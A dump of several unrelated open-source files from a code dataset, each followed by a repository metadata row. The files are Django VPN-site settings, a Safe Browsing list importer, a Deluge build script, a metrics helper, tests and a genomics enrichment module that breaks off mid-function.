WSGI_APPLICATION = 'ccvpn.wsgi.application'
LOGIN_URL = 'account:login'
LOGOUT_URL = 'account:logout'
LOGIN_REDIRECT_URL = 'account:index'
LOGOUT_REDIRECT_URL = '/'
PAGES_DIR = BASE_DIR + '/pages/'
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'ccvpn.passwords.LegacyPasswordHasher',
]
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = (
('fr', "French"),
('en', "English"),
)
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale/'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Security
X_FRAME_OPTIONS = 'SAMEORIGIN'
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
SECURE_SSL_REDIRECT = False
SECURE_HSTS_SECONDS = 3600
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
# Enable Discourse SSO
DISCOURSE_SSO = False
DISCOURSE_SECRET = '...'
DISCOURSE_URL = 'https://forum.ccrypto.org/'
# OpenVPN CA Certificate
with open(BASE_DIR + '/ccvpn/ca.crt') as ca_file:
OPENVPN_CA = ca_file.read()
# HTML added before </head>
ADDITIONAL_HEADER_HTML = ''
# HTML added before </body>
ADDITIONAL_HTML = ''
# Custom per cluster message displayed config page
# 'cluster_name': "No P2P"
LAMBDAINST_CLUSTER_MESSAGES = {}
# Name used in ticket emails
TICKETS_SITE_NAME = 'CCrypto VPN Support'
# Full URL to the site root
ROOT_URL = ''
# Forwarded for header name, if any (None will use remote_addr)
REAL_IP_HEADER_NAME = None
# reCAPTCHA API details. If empty, no captcha is displayed.
RECAPTCHA_API = 'https://www.google.com/recaptcha/api/siteverify'
RECAPTCHA_SITE_KEY = ''
RECAPTCHA_SECRET_KEY = ''
# lcore API settings
LCORE = dict(
BASE_URL='https://core.test.lambdavpn.net/v1/',
API_KEY='',
API_SECRET='',
INST_SECRET='',
CACHE_TTL=10,
)
# VPN auth credentials and expiration time storage
# - if 'core', password and expiration_date will be replicated to core and
# auth will be done from there.
# - if 'inst', both will be kept here and core should call the API here to
# authenticate users.
# 'core' is faster and doesn't depend on the instance's stability, 'inst'
# lets you generate client_config dynamically.
# /!\ don't use 'core' with unit tests for now.
VPN_AUTH_STORAGE = 'inst'
# Payment & Trial
# Payment backends. See payments/backends.py for more infos.
PAYMENTS_BACKENDS = {
'paypal': {
'TEST': True, # Sandbox
'ADDRESS': '[email protected]', # Your PayPal primary address
},
# Remove the leading '_' to enable these backends.
'_stripe': {
'API_KEY': '',
'PUBLIC_KEY': '',
},
'_bitcoin': {
'URL': 'http://test:[email protected]:18332/',
'BITCOIN_VALUE': 36000, # Value of one bitcoin in currency*100
},
}
PAYMENTS_CURRENCY = ('eur', '€')
CONSTANCE_BACKEND = 'constance.backends.database.DatabaseBackend'
CONSTANCE_CONFIG = {
'MOTD': ('', "Public site message, displayed on homepage"),
'MOTD_USER': ('', "Message for users, displayed on account home"),
'MONTHLY_PRICE_EUR': (300, "Base subscription price per month (x0.01€)"),
'BTC_EUR_VALUE': (300000, "Current value of a bitcoin (x0.01€/btc)"),
'TRIAL_PERIOD_HOURS': (2, "Hours given for each trial period"),
'TRIAL_PERIOD_MAX': (84, "Maximum number of trial periods to give (84*2h=1w)"),
'NOTIFY_DAYS_BEFORE': ("3, 1", "When to send account expiration notifications. In number of days before, separated y commas",
'integer_list'),
}
CONSTANCE_ADDITIONAL_FIELDS = {
'integer_list': ['django.forms.fields.CharField', {
'validators': [RegexValidator(r'^([0-9]+[ ,]+)*([0-9]+)?$')],
}],
}
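# Example values accepted by the 'integer_list' field above (illustrative): "3, 1"
# and "7,3,1" both match the validator regex; an empty string is also allowed.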
# Local settings
try:
from .local_settings import * # noqa
except ImportError:
pass
| mit | -5,602,495,552,386,245,000 | 26 | 129 | 0.67265 | false |
nccgroup/Mortimer | importgoogle.py | 1 | 5412 | #!/usr/bin/python
# A collection of scripts for processing network forensics type data and intel, mainly into a postgres database.
#
# Released as open source by NCC Group Plc - http://www.nccgroup.com/
#
# Developed for John Green, cirt at nccgroup dot com
#
# https://github.com/nccgroup/mortimer
#
# Released under AGPL see LICENSE for more information
import urllib
import urllib2
import psycopg2
import sys
from struct import unpack
APIKEY='GETYOUROWNKEY!'
APPVERSION='1.09'
PVERSION='2.2'
lists=['goog-malware-shavar', 'goog-regtest-shavar', 'goog-whitedomain-shavar', 'googpub-phish-shavar']
url = 'https://safebrowsing.clients.google.com/safebrowsing/downloads?client=api&apikey=%s&appver=%s&pver=%s' % (APIKEY,APPVERSION,PVERSION)
conn=psycopg2.connect("dbname=bro user=analyst3")
cur=conn.cursor()
def process_chunkS(chunk,hashlen,num,list):
n=0
# Empty chunk (sent by google to remove gaps)
if (len(chunk) == 0):
cur.execute("INSERT INTO s_chunks (num,list) values (%s,%s)",(num,list))
return
while(n<len(chunk)):
#hostkey=unpack('I',chunk[n:n+4])[0]
hostkey=chunk[n:n+4]
count=unpack('B',chunk[n+4])[0]
#print "Count",count
n+=5
if (count == 0):
addchunknum=unpack('>I',chunk[n:n+4])[0]
#print hostkey,addchunknum
cur.execute("INSERT INTO s_chunks (hostkey,num,add_num,list) values (%s,%s,%s,%s)", (psycopg2.Binary(hostkey),num,addchunknum,list))
n+=4
else:
#prefix=[]
for i in range(count):
#print i,count,n,len(chunk)
addchunknum=unpack('>I',chunk[n:n+4])[0]
prefix=chunk[n+4:n+4+hashlen]
#.encode('hex'))
#print hostkey,addchunknum,prefix
cur.execute("INSERT INTO s_chunks (hostkey,num,add_num,prefix,list) values (%s,%s,%s,%s,%s)", (psycopg2.Binary(hostkey),num,addchunknum,psycopg2.Binary(prefix),list))
n+=4+hashlen
def process_chunkA(chunk,hashlen,num,list):
n=0
if (len(chunk)== 0):
cur.execute("INSERT INTO a_chunks (num,list) values (%s,%s)",(num,list))
return
while(n<len(chunk)):
hostkey=chunk[n:n+4]
count=unpack('B',chunk[n+4])[0]
n+=5
if (count==0):
cur.execute("INSERT INTO a_chunks (hostkey,num,list) values (%s,%s,%s)", (psycopg2.Binary(hostkey),num,list))
else:
for i in range(count):
prefix=chunk[n:n+hashlen]
#.encode('hex'))
#print hostkey,prefix
cur.execute("INSERT INTO a_chunks (hostkey,num,prefix,list) values (%s,%s,%s,%s)", (psycopg2.Binary(hostkey),num,psycopg2.Binary(prefix),list))
n+=hashlen
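# Wire format handled by the two parsers above, as decoded here (per entry):
#   add chunk ('a'): [4-byte hostkey][1-byte count][count * hashlen prefix bytes];
#                    a count of 0 means the hostkey itself is the only entry
#   sub chunk ('s'): [4-byte hostkey][1-byte count] followed either by a single
#                    4-byte add-chunk number (count == 0) or by count entries of
#                    [4-byte add-chunk number][hashlen prefix bytes]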
def rangeConvert(nums):
"""
nums: sorted list of integers.
    returns a comma separated list with ranges
"""
if len(nums) == 0:
return ''
output = []
i = 0
while i < len(nums):
output.append(str(nums[i]))
use_range = False
while i < len(nums) - 1 and nums[i + 1] - nums[i] == 1:
i += 1
use_range = True
if use_range:
output.append('-')
output.append(str(nums[i]))
if i < len(nums) - 1:
output.append(',')
i += 1
return ''.join(output)
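# Worked example of rangeConvert (illustrative):
#   rangeConvert([1, 2, 3, 5, 7, 8]) -> "1-3,5,7-8"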
def rangeSplit(rangeStr):
"""
    rangeStr: sorted range list, e.g. 1,3-6,9-10,12,17
returns sorted list of integers
"""
ret=[]
for item in rangeStr.rstrip().split(','):
num=item.split('-')
if (len(num) == 1):
ret.append(int(num[0]))
elif (len(num) == 2):
            for val in range(int(num[0]), int(num[1]) + 1):  # range endpoints are inclusive
ret.append(val)
return ret
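# Worked example of rangeSplit, assuming the inclusive ranges produced by
# rangeConvert above (illustrative):
#   rangeSplit("1-3,5,7-8") -> [1, 2, 3, 5, 7, 8]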
print url
data=''
for list in lists:
cur.execute("SELECT DISTINCT num FROM a_chunks WHERE list=%s ORDER BY num ASC",(list,))
achunks=cur.fetchall()
arange=rangeConvert(map(lambda x:x[0],achunks))
cur.execute("SELECT DISTINCT num FROM s_chunks WHERE list= %s ORDER BY num ASC",(list,))
schunks=cur.fetchall()
srange=rangeConvert(map(lambda x:x[0],schunks))
data+=list+';'
if arange:
data+='a:'+arange
if arange and srange:
data+=':'
if srange:
data+='s:'+srange
data+='\n'
#sys.exit(1)
print data
#sys.exit(1)
request=urllib2.Request(url,data)
#sys.exit(1)
response=urllib2.urlopen(request)
for line in response.readlines():
line=line.rstrip()
(keyword,data)=line.split(':')
print keyword,data
if (keyword == 'n'):
delay=data
elif (keyword == 'i'):
list=data
elif (keyword == 'u'):
url=data
redirect_request=urllib2.Request('https://'+url)
redirect_response=urllib2.urlopen(redirect_request)
while (True):
redirect_line=redirect_response.readline()
if (not redirect_line):
break
(action,chunknum,hashlen,chunklen)=redirect_line.split(':')
print "reading ",int(chunklen)
print "chunk num ",int(chunknum)
if (action == 'a'):
chunk=redirect_response.read(int(chunklen))
process_chunkA(chunk,int(hashlen),int(chunknum),list)
elif (action == 's'):
chunk=redirect_response.read(int(chunklen))
process_chunkS(chunk,int(hashlen),int(chunknum),list)
else:
print "Unknown chunktype"
sys.exit(1)
print redirect_line
#sys.exit(1)
elif (keyword == 'ad'):
print "a delete",data
nums=rangeSplit(data)
cur.execute("DELETE FROM a_chunks WHERE num=ANY(%s)",(nums,))
print nums
elif (keyword == 'sd'):
print "s delete",data
nums=rangeSplit(data)
print nums
cur.execute("DELETE FROM s_chunks WHERE num=ANY(%s)",(nums,))
else:
print "keyword not recognised"
sys.exit(1)
conn.commit()
cur.close()
conn.close()
sys.exit(1)
| agpl-3.0 | 2,277,434,971,933,669,600 | 24.771429 | 170 | 0.642831 | false |
laanwj/deluge | win32/deluge-bbfreeze.py | 1 | 2368 | build_version = "1.3.1"
python_path = "C:\\Python26\\"
import os, glob
import shutil
shutil.copy(python_path + "Scripts\deluge-script.pyw", python_path + "Scripts\deluge.py")
shutil.copy(python_path + "Scripts\deluge-script.pyw", python_path + "Scripts\deluge-debug.py")
shutil.copy(python_path + "Scripts\deluged-script.py", python_path + "Scripts\deluged.py")
shutil.copy(python_path + "Scripts\deluge-web-script.py", python_path + "Scripts\deluge-web.py")
shutil.copy(python_path + "Scripts\deluge-gtk-script.pyw", python_path + "Scripts\deluge-gtk.py")
shutil.copy(python_path + "Scripts\deluge-console-script.py", python_path + "Scripts\deluge-console.py")
includes=("libtorrent", "gzip", "zipfile", "re", "socket", "struct", "cairo", "pangocairo", "atk", "pango", "wsgiref.handlers", "twisted.internet.utils", "gio", "gtk.glade")
excludes=("numpy", "OpenGL", "psyco", "win32ui")
dst = "..\\build-win32\\deluge-bbfreeze-" + build_version + "\\"
from bbfreeze import Freezer
f = Freezer(dst, includes=includes, excludes=excludes)
f.include_py = False
f.addScript(python_path + "Scripts\deluge.py", gui_only=True)
f.addScript(python_path + "Scripts\deluge-debug.py", gui_only=False)
f.addScript(python_path + "Scripts\deluged.py", gui_only=False)
f.addScript(python_path + "Scripts\deluge-web.py", gui_only=False)
f.addScript(python_path + "Scripts\deluge-gtk.py", gui_only=True)
f.addScript(python_path + "Scripts\deluge-console.py", gui_only=False)
f() # starts the freezing process
# add icons to the exe files
import icon
icon_path = os.path.join(os.path.dirname(__file__), "deluge.ico")
icon.CopyIcons(dst+"deluge.exe", icon_path)
icon.CopyIcons(dst+"deluge-debug.exe", icon_path)
icon.CopyIcons(dst+"deluged.exe", icon_path)
icon.CopyIcons(dst+"deluge-web.exe", icon_path)
icon.CopyIcons(dst+"deluge-gtk.exe", icon_path)
icon.CopyIcons(dst+"deluge-console.exe", icon_path)
# exclude files which are already included in GTK or Windows
excludeFiles = ("MSIMG32.dll", "MSVCR90.dll", "MSVCP90.dll", "POWRPROF.dll", "freetype*.dll", "iconv.dll", "intl.dll", "libatk*.dll", "libcairo*.dll", "libexpat*.dll", "libfontconfig*.dll", "libfreetype*.dll", "libgio*.dll", "libpng*.dll", "libtiff*.dll", "zlib1.dll")
for file in excludeFiles:
for filename in glob.glob(dst + file):
print "removing file:", filename
os.remove(filename)
| gpl-3.0 | -6,369,595,552,446,803,000 | 51.622222 | 268 | 0.711993 | false |
GoogleCloudPlatform/datacatalog-connectors | google-datacatalog-connectors-commons/src/google/datacatalog_connectors/commons/monitoring/metrics_processor.py | 1 | 2132 | #!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import timeit
from google.datacatalog_connectors.commons.monitoring import \
monitoring_facade
class MetricsProcessor:
def __init__(self,
project_id,
location_id,
entry_group_id,
enable_monitoring,
task_id=None):
self.__enable_monitoring = enable_monitoring
if enable_monitoring:
self.__monitoring_facade = monitoring_facade.MonitoringFacade(
project_id, location_id, entry_group_id, task_id)
self.__monitoring_facade.create_metrics()
self.__start_time = timeit.default_timer()
def reset_start_time(self):
self.__start_time = timeit.default_timer()
def process_elapsed_time_metric(self):
if self.__enable_monitoring:
stop_time = timeit.default_timer()
elapsed_time = int((stop_time - self.__start_time) * 1000)
self.__monitoring_facade.write_elapsed_time_metric(elapsed_time)
def process_entries_length_metric(self, entries_length):
if self.__enable_monitoring:
self.__monitoring_facade.write_entries_length_metric(
entries_length)
def process_metadata_payload_bytes_metric(self, metadata):
if self.__enable_monitoring:
metadata_as_json = json.dumps(metadata, default=str)
json_bytes = len(metadata_as_json.encode())
self.__monitoring_facade.write_metadata_payload_bytes_metric(
json_bytes)
| apache-2.0 | -4,256,730,824,790,819,000 | 35.758621 | 76 | 0.651501 | false |
MattRijk/ebook_site | books/migrations/0011_auto_20160422_1235.py | 1 | 1050 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('books', '0010_auto_20160422_1158'),
]
operations = [
migrations.AddField(
model_name='bookhasauthor',
name='name',
field=models.CharField(max_length=45, blank=True),
),
migrations.AddField(
model_name='bookhascategory',
name='title',
field=models.CharField(max_length=45, blank=True),
),
migrations.AlterField(
model_name='bookhasauthor',
name='id',
field=models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='bookhascategory',
name='id',
field=models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID'),
),
]
| mit | -7,376,450,695,064,534,000 | 28.882353 | 108 | 0.55619 | false |
luzfcb/cookiecutter | tests/test_specify_output_dir.py | 1 | 1852 | # -*- coding: utf-8 -*-
"""Tests for cookiecutter's output directory customization feature."""
import pytest
from cookiecutter import main
@pytest.fixture
def context():
"""Fixture to return a valid context as known from a cookiecutter.json."""
return {
u'cookiecutter': {
u'email': u'[email protected]',
u'full_name': u'Raphael Pierzina',
u'github_username': u'hackebrot',
u'version': u'0.1.0',
}
}
@pytest.fixture
def output_dir(tmpdir):
return str(tmpdir.mkdir('output'))
@pytest.fixture
def template(tmpdir):
template_dir = tmpdir.mkdir('template')
template_dir.join('cookiecutter.json').ensure(file=True)
return str(template_dir)
@pytest.fixture(autouse=True)
def mock_gen_context(mocker, context):
mocker.patch('cookiecutter.main.generate_context', return_value=context)
@pytest.fixture(autouse=True)
def mock_prompt(mocker):
mocker.patch('cookiecutter.main.prompt_for_config')
@pytest.fixture(autouse=True)
def mock_replay(mocker):
mocker.patch('cookiecutter.main.dump')
def test_api_invocation(mocker, template, output_dir, context):
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
main.cookiecutter(template, output_dir=output_dir)
mock_gen_files.assert_called_once_with(
repo_dir=template,
context=context,
overwrite_if_exists=False,
skip_if_file_exists=False,
output_dir=output_dir
)
def test_default_output_dir(mocker, template, context):
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
main.cookiecutter(template)
mock_gen_files.assert_called_once_with(
repo_dir=template,
context=context,
overwrite_if_exists=False,
skip_if_file_exists=False,
output_dir='.'
)
| bsd-3-clause | 4,489,060,777,101,034,000 | 23.693333 | 78 | 0.671166 | false |
willrp/willbuyer | backend/tests/functional/api/cart/test_order.py | 1 | 1226 | import requests
from backend.util.response.error import ErrorSchema
def test_order(domain_url, auth_session, es_create, willorders_ws_db_session):
prod_list = es_create("products", 2)
item_id = prod_list[0].meta["id"]
item_id2 = prod_list[1].meta["id"]
auth_session.post(
domain_url + "/api/cart/update/%s/1" % item_id
)
response = auth_session.post(
domain_url + "/api/cart/update/%s/2" % item_id2
)
cookie = response.cookies.get("session")
response = auth_session.put(
domain_url + "/api/cart/order"
)
data = response.json()
assert data == {}
assert response.status_code == 201
assert cookie != response.cookies.get("session")
cookie = response.cookies.get("session")
response = auth_session.put(
domain_url + "/api/cart/order"
)
data = response.json()
ErrorSchema().load(data)
assert response.status_code == 400
assert cookie == response.cookies.get("session")
def test_order_unauthorized(domain_url):
response = requests.put(
domain_url + "/api/cart/order",
verify=False
)
data = response.json()
ErrorSchema().load(data)
assert response.status_code == 401
| mit | -2,006,155,102,493,854,700 | 23.52 | 78 | 0.628059 | false |
RegulatoryGenomicsUPF/pyicoteo | pyicoteolib/enrichment.py | 1 | 40209 | """
Pyicoteo is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys, os
import math
import random
from core import Cluster, Region, InvalidLine, InsufficientData, ConversionNotSupported
from defaults import *
import utils
import bam
from regions import AnnotationGene, AnnotationTranscript, AnnotationExon, RegionWriter, read_gff_file, get_exons, get_introns, gene_slide
import warnings
try:
from shutil import move
except:
from os import rename as move
"""
Differential expression and MA plot visualization module.
"""
def _region_from_dual(self, line):
try:
self.cluster_aux.clear()
self.cluster_aux.read_line(line)
strand = None
if self.stranded_analysis:
strand = self.cluster_aux.strand
ret = Region(self.cluster_aux.name, self.cluster_aux.start, self.cluster_aux.end, name2=self.cluster_aux.name2, strand=strand)
self.cluster_aux.clear()
return ret
except ValueError:
pass #discarding header
def __calc_reg_write(self, region_file, count, calculated_region):
if count > self.region_mintags:
region_file.write(calculated_region.write())
def calculate_region(self):
"""
        Calculate a region file using the reads present in both of the main files being analyzed.
"""
self.logger.info('Generating regions...')
self.sorted_region_path = '%s/calcregion_%s.bed'%(self._output_dir(), os.path.basename(self.current_output_path))
region_file = open(self.sorted_region_path, 'wb')
if self.region_magic:
regwriter = RegionWriter(self.gff_file, region_file, self.region_magic, no_sort=self.no_sort, logger=self.logger, write_as=BED, galaxy_workarounds=self.galaxy_workarounds)
regwriter.write_regions()
dual_reader = utils.DualSortedReader(self.current_experiment_path, self.current_control_path, self.experiment_format, self.logger)
if self.stranded_analysis:
calculate_region_stranded(self, dual_reader, region_file)
else:
calculate_region_notstranded(self, dual_reader, region_file)
region_file.flush()
def __cr_append(self, regions, region):
regions.append(region)
def calculate_region_notstranded(self, dual_reader, region_file):
calculated_region = Region()
readcount = 1
for line in dual_reader:
if not calculated_region: #first region only
calculated_region = _region_from_dual(self, line)
calculated_region.end += self.proximity
else:
new_region = _region_from_dual(self, line)
new_region.end += self.proximity
if calculated_region.overlap(new_region):
calculated_region.join(new_region)
readcount += 1
else:
calculated_region.end -= self.proximity
__calc_reg_write(self, region_file, readcount, calculated_region)
calculated_region = new_region.copy()
readcount = 1
if calculated_region:
calculated_region.end -= self.proximity
__calc_reg_write(self, region_file, readcount, calculated_region)
def calculate_region_stranded(self, dual_reader, region_file):
temp_region_file = open(self.sorted_region_path, 'wb')
region_plus = Region()
region_minus = Region()
regions = []
numreads_plus = 1
numreads_minus = 1
dual_reader = utils.DualSortedReader(self.current_experiment_path, self.current_control_path, self.experiment_format, self.logger)
for line in dual_reader:
new_region = _region_from_dual(self, line)
new_region.end += self.proximity
        # initialise the per-strand regions the first time a read of that strand is seen
        if not region_plus and new_region.strand == PLUS_STRAND:
            region_plus = _region_from_dual(self, line)
        elif not region_minus and new_region.strand != PLUS_STRAND:
            region_minus = _region_from_dual(self, line)
else:
if region_plus.overlap(new_region) and region_plus.strand == new_region.strand:
region_plus.join(new_region)
numreads_plus += 1
elif region_minus.overlap(new_region) and region_minus.strand == new_region.strand:
region_minus.join(new_region)
numreads_minus += 1
else:
if new_region.strand == region_plus.strand:
region_plus.end -= self.proximity
self.__calc_reg_write(region_file, numreads_plus, region_plus)
region_plus = new_region.copy()
numreads_plus = 1
else:
region_minus.end -= self.proximity
self.__calc_reg_write(region_file, numreads_minus, region_minus)
region_minus = new_region.copy()
numreads_minus = 1
if region_plus:
region_plus.end -= self.proximity
regions.append(region_plus)
if region_minus:
region_minus.end -= self.proximity
regions.append(region_minus)
regions.sort(key=lambda x:(x.name, x.start, x.end, x.strand))
for region in regions:
region_file.write(region.write())
def get_zscore(x, mean, sd):
if sd > 0:
return float(x-mean)/sd
else:
        return 0 # these points are weird anyway
def read_interesting_regions(self, file_path):
regs = []
try:
regs_file = open(file_path, 'r')
for line in regs_file:
regs.append(line.strip())
except IOError as ioerror:
self.logger.warning("Interesting regions file not found")
return regs # memory inefficient if there's a large number of interesting regions
def plot_enrichment(self, file_path):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
try:
if self.postscript:
import matplotlib
matplotlib.use("PS")
from matplotlib.pyplot import *
from matplotlib import rcParams
rcParams.update({'font.size': 22})
rcParams['legend.fontsize'] = 14
#decide labels
if self.label1:
label_main = self.label1
else:
if self.real_control_path and self.real_experiment_path:
label_main = '%s VS %s'%(os.path.basename(self.real_experiment_path), os.path.basename(self.real_control_path))
else:
label_main = "A VS B"
if self.label2:
label_control = self.label2
else:
if self.replica_path:
label_control = '%s(A) VS %s(A)'%(os.path.basename(self.real_experiment_path), os.path.basename(self.replica_path))
else:
label_control = 'Background distribution'
#self.logger.info("Interesting regions path: %s" % (self.interesting_regions))
interesting_regs = []
if self.interesting_regions:
self.logger.info("Reading interesting regions...")
interesting_regs = read_interesting_regions(self, self.interesting_regions)
#self.logger.info("Interesting regions: %s" % (interesting_regs))
#self.logger.info("Plot path: %s" % (file_path))
interesting_A = []
interesting_M = []
#self.logger.info("disable_significant: %s" % (self.disable_significant_color))
A = []
A_prime = []
M = []
M_significant = []
A_significant = []
M_prime = []
A_medians = []
points = []
minus_points = []
all_points = []
figure(figsize=(14,22))
biggest_A = -sys.maxint #for drawing
smallest_A = sys.maxint #for drawing
biggest_M = 0 #for drawing
self.logger.info("Loading table...")
for line in open(file_path):
sline = line.split()
try:
enrich = dict(zip(enrichment_keys, sline))
# WARNING: for slide inter and slide intra: name2 = 'start:end' (no gene_id, FIXME?)
name2 = enrich['name2'].split(':')
gene_id = name2[0]
if len(name2) >= 2:
transcript_id = name2[1] # consider transcript_id? (exons)
else:
transcript_id = None
if gene_id in interesting_regs or transcript_id in interesting_regs:
interesting_M.append(float(enrich["M"]))
interesting_A.append(float(enrich["A"]))
biggest_A = max(biggest_A, float(enrich["A"]))
smallest_A = min(smallest_A, float(enrich["A"]))
biggest_M = max(biggest_M, abs(float(enrich["M"])))
biggest_A = max(biggest_A, float(enrich["A_prime"]))
smallest_A = min(smallest_A, float(enrich["A_prime"]))
biggest_M = max(biggest_M, abs(float(enrich["M_prime"])))
positive_point = self.zscore*float(enrich["sd"])+float(enrich["mean"])
negative_point = -self.zscore*float(enrich["sd"])+float(enrich["mean"])
A_median = float(enrich["A_median"])
all_points.append((A_median, positive_point, negative_point))
if abs(float(enrich["zscore"])) < self.zscore:
M.append(float(enrich["M"]))
A.append(float(enrich["A"]))
else:
M_significant.append(float(enrich["M"]))
A_significant.append(float(enrich["A"]))
M_prime.append(float(enrich["M_prime"]))
A_prime.append(float(enrich["A_prime"]))
except ValueError:
pass #to skip the header
all_points.sort(key= lambda x:x[0])
for t in all_points:
(A_medians.append(t[0]), points.append(t[1]), minus_points.append(t[2]))
if points:
margin = 1.1
A_medians.append(biggest_A*margin)
points.append(points[-1])
minus_points.append(minus_points[-1])
A_medians.insert(0, smallest_A)
points.insert(0, points[0])
minus_points.insert(0, minus_points[0])
self.logger.info("Plotting points...")
#Background plot
subplot(211, axisbg="lightyellow")
xlabel('Average', fontsize=30)
ylabel('Log2 ratio', fontsize=30)
axis([smallest_A*margin, biggest_A*margin, -biggest_M*margin, biggest_M*margin])
plot(A_prime, M_prime, '.', label=label_control, color = '#666666')
plot(A_medians, points, 'r--', label="Z-score (%s)"%self.zscore)
plot(A_medians, minus_points, 'r--')
axhline(0, linestyle='--', color="grey", alpha=0.75)
leg = legend(fancybox=True, scatterpoints=1, numpoints=1, loc=2, ncol=4, mode="expand")
leg.get_frame().set_alpha(0.5)
#Experiment plot
subplot(212, axisbg="lightyellow")
axis([smallest_A*margin, biggest_A*margin, -biggest_M*margin, biggest_M*margin])
plot(A, M, 'k.', label=label_main)
if self.disable_significant_color:
significant_marker = 'ko'
else:
significant_marker = 'ro'
plot(A_significant, M_significant, significant_marker, label="%s (significant)"%label_main)
plot(A_medians, points, 'r--', label="Z-score (%s)"%self.zscore)
plot(A_medians, minus_points, 'r--')
if self.interesting_regions:
interesting_label = label_main + ' (interesting)'
plot(interesting_A, interesting_M, 'H', label=interesting_label, color='#00EE00') # plotting "interesting" regions
axhline(0, linestyle='--', color="grey", alpha=0.75)
xlabel('Average', fontsize=30)
ylabel('Log2 ratio', fontsize=30)
leg2 = legend(fancybox=True, scatterpoints=1, numpoints=1, loc=2, ncol=4)
leg2.get_frame().set_alpha(0.7)
self._save_figure("enrichment_MA", width=500, height=2800)
else:
self.logger.warning("Nothing to plot.")
except ImportError:
if self.debug:
raise
__matplotlibwarn(self)
def __matplotlibwarn(self):
#FIXME move to utils.py or plotting module
self.logger.warning('Pyicos can not find an installation of matplotlib, so no plot will be drawn. If you want to get a plot with the correlation values, install the matplotlib library.')
def __calc_M(signal_a, signal_b):
return math.log(float(signal_a)/float(signal_b), 2)
def __calc_A(signal_a, signal_b):
return (math.log(float(signal_a), 2)+math.log(float(signal_b), 2))/2
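# Worked example (illustrative only, not from the original module): for
# normalized signals signal_a=8 and signal_b=2,
#   M = __calc_M(8, 2) = log2(8/2)             = 2.0  (log ratio)
#   A = __calc_A(8, 2) = (log2(8) + log2(2))/2 = 2.0  (average log signal)
# so the region plots at (A=2, M=2) on the MA plot, i.e. four-fold higher
# signal in sample A at a moderate average level.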
def _calculate_MA(self, region_path, read_counts, factor = 1, replica_factor = 1, file_a_reader=None, file_b_reader=None, replica_reader=None):
tags_a = []
tags_b = []
numreads_background_1 = 0
numreads_background_2 = 0
total_reads_background_1 = 0
total_reads_background_2 = 0
self.logger.debug("Inside _calculate_MA")
self.regions_analyzed_count = 0
enrichment_result = [] #This will hold the name, start and end of the region, plus the A, M, 'A and 'M
if NOWRITE not in self.operations:
out_file = open(self.current_output_path, 'wb')
for region_line in open(region_path):
sline = region_line.split()
region_of_interest = self._region_from_sline(sline)
if region_of_interest:
region_a = None
replica = None
replica_tags = None
signal_a = -1
signal_b = -1
signal_background_1 = -1
signal_background_2 = -1
swap1 = Region()
swap2 = Region()
if read_counts:
signal_a = float(sline[6])
signal_b = float(sline[7])*factor
signal_background_1 = float(sline[8])
signal_background_2 = float(sline[9])*replica_factor
if CHECK_REPLICAS in self.operations:
self.experiment_values.append(signal_background_1)
self.replica_values.append(signal_background_2)
else:
self.logger.debug("Reading tags for %s ..."%region_of_interest)
if self.experiment_format == BAM:
tags_a = len(file_a_reader.get_overlaping_clusters(region_of_interest, overlap=self.overlap))
tags_b = len(file_b_reader.get_overlaping_clusters(region_of_interest, overlap=self.overlap))
else:
tags_a = file_a_reader.get_overlaping_counts(region_of_interest, overlap=self.overlap)
tags_b = file_b_reader.get_overlaping_counts(region_of_interest, overlap=self.overlap)
if self.use_replica:
if self.experiment_format == BAM:
replica_tags = len(replica_reader.get_overlaping_clusters(region_of_interest, overlap=self.overlap))
else:
replica_tags = replica_reader.get_overlaping_counts(region_of_interest, overlap=self.overlap)
self.logger.debug("... done. tags_a: %s tags_b: %s"%(tags_a, tags_b))
#if we are using pseudocounts, use the union, use the intersection otherwise
if (self.pseudocount and (tags_a or tags_b)) or (not self.pseudocount and tags_a and tags_b):
signal_a = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount, factor, self.total_reads_a, tags_a)
signal_b = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount, factor, self.total_reads_b, tags_b)
self.already_norm = True
if not self.counts_file:
if (self.pseudocount and (tags_a or tags_b)) or (not self.pseudocount and tags_a and tags_b):
if self.use_replica:
replica = region_of_interest.copy()
#replica.add_tags(replica_tags)
numreads_background_1 = tags_a
numreads_background_2 = replica_tags
total_reads_background_1 = self.total_reads_a
